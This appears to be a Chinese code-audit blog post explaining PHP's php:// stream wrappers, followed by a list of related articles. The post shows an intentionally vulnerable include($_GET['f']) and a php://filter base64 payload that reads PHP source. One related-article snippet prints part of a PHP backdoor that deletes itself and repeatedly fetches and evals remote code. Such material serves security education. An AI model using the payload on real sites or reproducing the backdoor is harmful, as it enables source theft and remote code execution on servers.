php多个subnit提交_代码审计之php://输入输出流

最新推荐文章于 2023-11-27 22:50:49 发布
最新推荐文章于 2023-11-27 22:50:49 发布
阅读量270 收藏
点赞数
文章标签: php多个subnit提交
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35765225/article/details/112225557
版权

PHP提供了php://的协议允许访问PHP的输入输出流、标准输入输出和错误描述符,内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。主要提供如下访问方式来使用这些封装器:

php://stdin
php://stdout
php://stderr 
php://input
php://output 
php://output 
php://fd 
php://memory
php://temp 
php://filter

使用最多的是

php://input、php://output以及php://filter
  • php://input

其中php://input是可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据,但是php://input不能在获取“multipart/form-data”方式提交的数据。我们做一个测试,测试代码如下:

<?php
echo file_get_contents("php://input");
?>

当我们用POST提交a=111111时,a=111111被直接打印出来,如图所示

5fb85e4229876566340a5237dfc6e496.png
  • php://output

而php://output是一个只写的数据流,跟php://input相反,php://input是读取POST提交上来的数据,而php://output则是将流数据输出。

  • php://filter

php://filter是一个文件操作的协议,可以对磁盘中的文件进行读写操作,效果类似于readfile()、file()和file_get_contents(),它有多个参数可以进行相应的操作,说明如表所示

76f1318b3f55016d0ff02960fea7b79c.png

我们来测试使用php://filter写文件,测试代码如下:

<?php
	file_put_contents("php://filter/write=string.rot13/resource=example.txt","Hello World");
?>

当我们执行代码的时候,会像脚本同目录下写入“example.txt”文件,内容为rot13编码过的“Hello World”

而php://filter还可以用来读文件,如果有远程文件保护漏洞,类似如下的代码:

<?php
	include($_GET['f']);
?>

正常情况下如果我们直接传入一个文件名,则是会被include函数包含并执行,如果我们想读取Web目录下的PHP文件,则可以通过请求:

/1.php?f=php://filter/convert.base64-encode/resource=1.php

来将文件进行Base64编码后输出,输入结果如图所示。

474082cc69476e408fa3b5ff8d07827d.png
稚气筱筱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php stdin是什么意思,php:// input和php:// stdin之间有什么区别?
weixin_36327991的博客
04-02 770
不同之处在于您希望使用它们的环境. php:// stdin,php:// stdout和php:// stderr直接映射到相关的POSIX file streams,旨在与CLI SAPI一起使用.另一方面,php:// input和php://输出旨在用于基于Web的SAPI.尝试从命令行运行这两个命令:printf "foo" | php -r "var_dump(file_get_con...
PHP中file_get_contents的使用方法
Jack huang的专栏
03-26 7421
$data=file_get_contents("php://input"); php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 always_p......
file_get_contents() 函数详解与使用
最新发布
wangxuanyang_zer的博客
11-27 6670
file_get_contents() 函数是 PHP 中一个功能丰富、易于使用的函数,可以用于文件操作和发起 HTTP 请求。通过深入理解该函数的使用方法,我们可以更高效地处理文件读取和远程资源获取任务。同时,使用上下文选项和其他相关函数,可以使 file_get_contents() 更加灵活和强大。在实际应用中,根据需求的不同,我们可以选择合适的方式来充分发挥其优势,提高代码的可维护性和效率。两个字 🐮 🍺 各位大佬来个三连支持一下。
php中file_get_contents
Cray
10-25 424
这个利用了file_get_contents的特性,当用到php://input的时候,file_get_contents支持字节流输入,只要将a设为php://input,且post 你要的数据过去即可
PHP经验之-file_get_contents
qq_14989227的博客
03-05 822
继续分享下PHP的一些常用的代码:file_get_contents  这个函数对于抓取页面,或者读取东西,URL传值都有很大的帮助的file_get_contents可以用来模拟表单传值,更curl传值一样json_encode是json传值用的json_decode('值',true)加了true 之后就变成数组了要是file_get_contents();传值过去返回值是空的话,要在前面加上...
[转]PHP中使用file_get_contents()抓取网页乱码的问题
gxl_ct001的专栏
06-27 246
ntent=iconv("GBK","UTF- 8",$content), (1)$htmlsource = iconv("gb2312", "utf-8//IGNORE",$htmlsource); (2)用mb_convert_encoding( $string, 'UTF-8', 'UTF-8,GBK,GB2312,BIG5' ); 转换编码   二,开了gzip的 如何抓取开了gzip的页面,如何判断页面开了
macframe.php_file_get_contents
weixin_28940939的博客
12-30 529
用户评论:[#1]rickywap at ymail dot com [2014-12-01 11:22:01]howtogetcontentoneimagesinpageanamesite,example:postmessageuserfb[#2]rickywap at ymail dot com [2014-12-01 11:18:41]howtogetco...
PHP file_get_contents函数详解
热门推荐
秋风扫落叶
09-01 1万+
一. file_get_contents(path,include_path,context,start,max_length) 参数 描述 path 必需。规定要读取的文件。 include_path 可选。如果也想在 include_path ...
2.2. php://stdin & php://stdout
weixin_34167819的博客
12-27 253
$ cat test.php #!/usr/bin/php <?php $handle = fopen("php://stdin", "r"); while (!feof($handle)) { $buffer = fgets($handle); print($buffer); } fclose($handle); ...
php中 file_get_contents('php://input')的用法及与 POST 的区别
qq_41445224的博客
03-29 1万+
file_get_contents :— 将整个文件读入一个字符串 在用php写接口的时候,通常会将请求的数据通过json的形式发送到指定的请求地址处,此时的file_get_contents(‘php://input’) 主要是用来获取请求的原始数据,注意,此时数据的提交方式应为POST,并且enctype不等于”multipart/form-data”。 看如下例子: 提交表单内容如下 ...
file_get_contents("php://input")的使用方法
快乐de馒头
02-21 2784
$data = file_get_contents("php://input"); php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 alwa
PHP 安全:过滤、验证和转义
一夜长风的专栏
09-02 7685
PS:来自http://laravelacademy.org/post/4610.html 我们在开发应用时,一般有个约定:不要信任任何来自不受自己控制的数据源中的数据。例如以下这些外部源: $_GET $_POST $_REQUEST $_COOKIE $argv php://stdin php://input file_get_contents() 远程数据
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2828
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
php里 file_get_contents("php://input")
u011101738的博客
07-15 1358
php://input 可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data 客户端使用ajax技术中的post方法向服务器发送的所有内容都可以在服务器中的一个特殊文件php://input中找到. file_g
如何读取shell 管道传输过来的内容
weixin_37586145的博客
03-01 507
如何读取shell 管道传输过来的内容 暮夏,您好!rainbird给您发了短消息:已经写了不少后台运行的deamon了.用的挺顺手的,但是我现在想获取管道传过来的内容,不知道咋实现,类似echo "aaaa" |a.php,a.php怎么获得echo的内容,不知道您有什么高见.     今天收到一条消息,解决的方法给大家分享...
阅读如下代码,问用户点击登录系统按钮请求将会触发Servlet中哪个方法进行处理()。Web.xml配置: <servlet> <servlet-name>UserServlet<iservlet-name> <servlet-class>org.web.servlet.UserServlet<i servlet-class></servlet> <servlet> <servlet-name>ResourceServlet<i servlet-name> <servlet-class>org.web.servlet.ResourceServlet</servlet-class></servlet> <servlet-mapping> <servlet-name>UserServlet<lservlet-name> <url-pattern>/servlet/UserServlet<furl-pattern><} servlet-mapping> <servlet-mapping> <servlet-name>ResourceServlet<lservlet-name> <url-pattern>lservlet/Resourceservlet<furl-pattern> </servlet-mapping>JSP页面: <form action="<%=basePath%>servlet/UserServlet?tag=loginmethod="post"> 用户名:<input type="text" class="input-text" name="loginName">密码:〈input type="password" class="input-text" name="password" 1><input type="subnit" value="登录系统” class="input-button"1> </form> (选择一项) A:触发org.web.servlet.UserServlet的doGet方法B:触发org.web.servlet.UserServlet的doPost方法 C:触发org.web.servlet.ResourceServlet的doPost方法 D:触发org.web.servlet. ResourceServlet的doGet方法
06-03
因为JSP页面中form的action指向了UserServlet,并且method为post,所以当用户点击登录系统按钮提交请求时,会触发UserServlet的doPost方法进行处理。同时,通过tag=login的参数,可以在UserServlet中区分不同的业务...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值